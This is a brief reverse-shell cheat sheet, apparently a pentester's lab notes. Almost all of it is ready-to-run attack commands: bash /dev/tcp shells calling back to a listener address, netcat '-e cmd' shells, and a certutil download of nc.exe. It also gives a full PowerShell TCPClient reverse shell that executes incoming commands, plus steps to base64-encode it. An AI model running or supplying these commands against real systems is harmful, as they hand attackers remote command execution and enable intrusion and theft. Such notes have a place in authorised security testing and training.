WEBSHELLS

Different kinds of webshells can be found in kali directory.

Also here pentestmonkey.net




LINUX SHELL

bash -c "bash -i >& /dev/tcp/192.168.119.3/4444 0>&1"

netcat

wget nc.exe

./nc.exe <myip> <myport> -e cmd

BASH

 1. start listener over non blocked port like 443 == nc -lvnp 443

 2. Then insert this command where you have rce == 'bash -c "bash -i >& /dev/tcp/<myip>/443 0>&1"'


WINDOWS SHELL

netcat

certutil -urlcache -split -f http://<myip>/nc.exe

.\nc.exe <myip> <myport> -e cmd

POWERSHELL

  1. $Text = '$client = New-Object System.Net.Sockets.TCPClient("192.168.119.3",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'

  2. Then run these cmds to encode it.

  3. $Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)

  4. $EncodedText =[Convert]::ToBase64String($Bytes)
